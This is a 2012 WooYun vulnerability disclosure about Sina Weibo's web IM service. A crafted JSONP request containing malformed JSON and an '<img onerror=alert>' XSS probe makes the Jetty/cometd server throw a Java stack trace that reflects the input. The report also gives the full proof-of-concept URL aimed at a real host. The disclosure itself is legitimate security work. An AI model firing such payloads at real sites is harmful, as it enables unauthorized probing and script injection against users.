当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05679

漏洞标题:在jason数据处理时未加验证,爆出异常。

相关厂商:新浪

漏洞作者: marker

提交时间:2012-03-31 11:01

修复时间:2012-05-15 11:02

公开时间:2012-05-15 11:02

漏洞类型:异常处理

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-03-31: 细节已通知厂商并且等待厂商处理中
2012-03-31: 厂商已经确认,细节仅向厂商公开
2012-04-10: 细节向核心白帽子及相关领域专家公开
2012-04-20: 细节向普通白帽子公开
2012-04-30: 细节向实习白帽子公开
2012-05-15: 细节向公众公开

简要描述:

在jason数据处理时未加验证,爆出异常。

详细说明:

http://2.49.web1.im.weibo.com/im?jsonp=parent.org.cometd.script._callback57&message=[{%22channel%22:%22/meta/connect%22%3E;%3Cimg%20src=e%20onerror=alert%281234%29%3E%22,%22connectionType%22:%22callback-polling%22,%22id%22:58,%22clientId%22:%221s1wcv8qe8ap74hddzu%22}]&1333160737516

漏洞证明:

HTTP ERROR 404
Problem accessing /error.html. Reason:
NOT_FOUND
Caused by:
java.lang.Error: [{"channel":"/meta/connect">;<img src=e onerror=alert(1234)>","connectionType":"callback-polling","id":58,"clientId":"1s1wcv8qe8ap74hddzu"}]
at org.mortbay.cometd.AbstractCometdServlet.getMessages(AbstractCometdServlet.java:343)
at org.mortbay.cometd.continuation.ContinuationCometdServlet.service(ContinuationCometdServlet.java:71)
at org.mortbay.cometd.AbstractCometdServlet.service(AbstractCometdServlet.java:249)
at org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:511)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1166)
at filters.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:134)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1157)
at org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:388)
at org.mortbay.jetty.security.SecurityHandler.handle(SecurityHandler.java:216)
at org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:182)
at org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:765)
at org.mortbay.jetty.webapp.WebAppContext.handle(WebAppContext.java:418)
at org.mortbay.jetty.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:230)
at org.mortbay.jetty.handler.HandlerCollection.handle(HandlerCollection.java:114)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.handler.StatisticsHandler.handle(StatisticsHandler.java:53)
at cn.vika.webim.servlet.RequestStat.handle(RequestStat.java:51)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:923)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:547)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at org.mortbay.io.nio.SelectChannelEndPoint.run(SelectChannelEndPoint.java:409)
at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
Caused by: java.lang.IllegalStateException: Unexpected '>' while seeking one of ',}'
at org.mortbay.util.ajax.JSON.seekTo(JSON.java:1167)
at org.mortbay.util.ajax.JSON.parseObject(JSON.java:812)
at org.mortbay.util.ajax.JSON.parse(JSON.java:745)
at org.mortbay.util.ajax.JSON.parseArray(JSON.java:880)
at org.mortbay.util.ajax.JSON.parse(JSON.java:747)
at org.mortbay.cometd.MessagePool.parseTo(MessagePool.java:151)
at org.mortbay.cometd.AbstractCometdServlet.getMessages(AbstractCometdServlet.java:331)
... 25 more
Caused by:
java.lang.IllegalStateException: Unexpected '>' while seeking one of ',}'
at org.mortbay.util.ajax.JSON.seekTo(JSON.java:1167)
at org.mortbay.util.ajax.JSON.parseObject(JSON.java:812)
at org.mortbay.util.ajax.JSON.parse(JSON.java:745)
at org.mortbay.util.ajax.JSON.parseArray(JSON.java:880)
at org.mortbay.util.ajax.JSON.parse(JSON.java:747)
at org.mortbay.cometd.MessagePool.parseTo(MessagePool.java:151)
at org.mortbay.cometd.AbstractCometdServlet.getMessages(AbstractCometdServlet.java:331)
at org.mortbay.cometd.continuation.ContinuationCometdServlet.service(ContinuationCometdServlet.java:71)
at org.mortbay.cometd.AbstractCometdServlet.service(AbstractCometdServlet.java:249)
at org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:511)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1166)
at filters.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:134)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1157)
at org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:388)
at org.mortbay.jetty.security.SecurityHandler.handle(SecurityHandler.java:216)
at org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:182)
at org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:765)
at org.mortbay.jetty.webapp.WebAppContext.handle(WebAppContext.java:418)
at org.mortbay.jetty.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:230)
at org.mortbay.jetty.handler.HandlerCollection.handle(HandlerCollection.java:114)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.handler.StatisticsHandler.handle(StatisticsHandler.java:53)
at cn.vika.webim.servlet.RequestStat.handle(RequestStat.java:51)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:923)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:547)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at org.mortbay.io.nio.SelectChannelEndPoint.run(SelectChannelEndPoint.java:409)
at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
Powered by Jetty://

修复方案:

验证输入,增加异常处理

版权声明:转载请注明来源 marker@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2012-03-31 12:07

厂商回复:

感谢提供

最新状态:

暂无


漏洞评价:

评论